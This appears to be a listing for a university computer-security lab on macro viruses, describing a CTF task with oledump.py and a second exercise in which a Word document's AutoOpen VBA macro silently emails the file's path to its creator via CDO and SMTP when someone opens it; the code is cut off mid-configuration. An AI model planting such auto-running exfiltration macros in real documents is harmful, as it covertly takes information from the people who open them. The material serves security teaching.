计算机安全Ⅰ实验:利用 oledump.py 分析工具提取宏代码夺旗
资源文件列表:

SS-Macro1.doc 20.84KB
实验3 宏病毒实验更新版.pdf 1.59MB
实验3.1.doc 1.11MB
资源介绍:
华南理工大学李家春老师的计算机安全Ⅰ选修课实验。目的:利用 oledump.py 分析工具提取文档中的宏代码,通过分析完成flag的查找。 有操作文档,完整的实验报告,oledump.py等工具文件。
实验三 宏病毒
1.包含两个实验:
1)利用 oledump.py 分析工具提取文档中的宏代码,通过分析完成 flag 的查找。
2)制作一个 Word 文档发送给另外一个同学,当对方打开该文档时,会自动给
你发一封电子邮件,你可以知道该文档在对方电脑存储的具体路径。可使用微软
的 CDO 组件。
2.挑战题:远程模板攻击
实验3.1 夺旗
1. 实验描述
利用 oledump.py 分析工具提取文档中的宏代码,通过分析完成 flag 的查找。
2. 实验目的
1)了解宏代码的编写
2) 熟悉 oledump 的使用
3)了解 flag 的查找流程
3. 实验工具
Python, Oledump.py,olefile, SS-Macro1.doc
环境描述
Windows 环境,office word
4. 实验步骤:请用自己的截图替换说明文档中的截图,不允许 copy 本文档中的截图!
1)打开 CMD,使用命令 python oledump.py 文件名,查看文件流信息。
下图中的 M 表示该段中有宏代码。

如果没有 olefile,通过 pip 下载即可。
2)python oledump.py -s A3 -v SS-Macro1.doc >1.txt 可以将 A3 段中的宏代码提取到 1.txt
中,再进行查看。
利用相同方式将其他几段的宏代码提取出来。
3)打开 txt 文件,寻找 flag。

1)新建一个 word 文档,以用于实验。首先检查其宏设置,并启用宏。一般在文件->选项,
然后找到信任中心->信任中心设置。
2)在工具栏找到宏,不同版本 word 可能位置不同,单击宏,弹出窗口。最后点击创建,会
弹出新的窗口。注意宏的位置选择当前文档,避免对其他文档也进行宏插入。
如 果 出 现 无 法 创 建 宏 的 问 题 , 可 以 尝 试 在 路 径
C:\Users\**\AppData\Roaming\Microsoft\Templates 下将 Normal.dotm 进行删除

3)在弹出的窗口写以下代码(红色为需要修改或注意的地方)。SMTP 服务中继端口一般为
25,对于 QQ 的 SMTP 发送邮件服务器为 smtp.qq.com,发送端口为 465 或 587。
Sub AutoOpen()
'Dim myEmail As New CDO.Message
Set myEmail = CreateObject("CDO.Message") ' 创建对象 ' 引 用 路 径 :
C:\Windows\system32\cdosys.dll
myEmail.From = "booven0528@163.com" '设置发信人的邮箱"
myEmail.To = "1850531355@qq.com" '设置收信人的邮箱
myEmail.Subject = "返回试验" '设定邮件的主题
myEmail.Textbody = ActiveDocument.FullName '得到 word 文档的路径
'cm.HTMLBody = "邮件发送试验^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^" '使用 html 格式发
送邮件
stUl = "http://schemas.microsoft.com/cdo/configuration/" '微软服务器网址
With myEmail.Configuration.Fields
.Item(stUl & "smtpserver") = "smtp.163.com" 'SMTP 服务器地址
.Item(stUl & "smtpserverport") = 25 'SMTP 服务器端口 126、163 25